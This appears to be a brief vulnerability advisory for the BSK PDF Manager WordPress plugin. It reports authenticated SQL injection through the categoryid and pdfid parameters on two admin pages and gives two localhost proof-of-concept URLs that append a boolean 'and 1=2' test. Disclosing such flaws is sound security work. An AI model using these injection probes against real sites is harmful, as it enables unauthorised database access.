The plugin did not use prepared statement with the categoryid and pdfid parameter when viewing the /wp-admin/admin.php?page=bsk-pdf-manager and /wp-admin/admin.php?page=bsk-pdf-manager-pdfs page leading to Authenticated SQL Injection issues
https://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view;=edit&pdfid;=1 and 1=2 https://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view;=edit&categoryid;=1 and 1=2